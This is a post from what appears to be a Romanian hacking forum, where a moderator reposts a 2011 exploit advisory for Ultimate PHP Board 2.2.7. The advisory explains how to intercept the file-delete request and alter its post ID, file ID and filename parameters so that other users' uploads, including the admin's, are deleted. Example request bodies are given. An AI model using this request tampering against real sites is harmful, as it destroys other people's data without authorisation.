EliteHackers
SALUT 2022!!
NE-AM MUTAT PE DISCORD !
Vrei să inviți un prieten?
[T]eoria [H]aosului [C]ontrolat - https://discord.com/invite/U4HBCHzm7r
Acesta aste link-ul oficial al acestui server.
|
Lista Forumurilor Pe Tematici
|
EliteHackers | Reguli | Inregistrare | Login
POZE ELITEHACKERS
Nu sunteti logat.
|
Nou pe simpatie: princess79 pe Simpatie.ro
 | Femeie 25 ani Bucuresti cauta Barbat 25 - 60 ani |
|
r3v
Moderator
 Inregistrat: acum 16 ani
Postari: 1158
|
|
Code:
# Exploit Title : Ultimate PHP Board 2.2.7 "Broken Authentication and Session Management"
# Date : 2011.05.17
# Author : i2sec - Gi bum Hong
# Software Link : http://sourceforge.net/projects/textmb/files/UPB/UPB%202.2.7/
# Version : 2.2.7
# Tested on : apache 2.2.14 | mysql 5.1.39 | php 5.2.12
This Vulnerabibity Web base on "Broken Authentication and Session Management".
This attack can delete another user's(ex.admin) upload file.
step1.
Analyze request message of file delete using Paros Tool.
ex) http-request-message body : ~&postid=2&~~&threadid=1&divname=1-1-2-attach&fileid=3&filename=file.txt~
step2.
Change request message to attacking file's post ID and file ID/name.
ex) http-request-message body : ~&postid=1&~~&threadid=1&divname=1-1-1-attach&fileid=2&filename=account.txt~
Full Advisory: http://www.exploit-db.com/download_pdf/17307 |
_______________________________________ http://thieves-team.com r3vyk.info mess id: doar prin PM datorita faptului ca mi-au dat add 10000 de retardati care joaca metin
|
|
| pus acum 15 ani |
|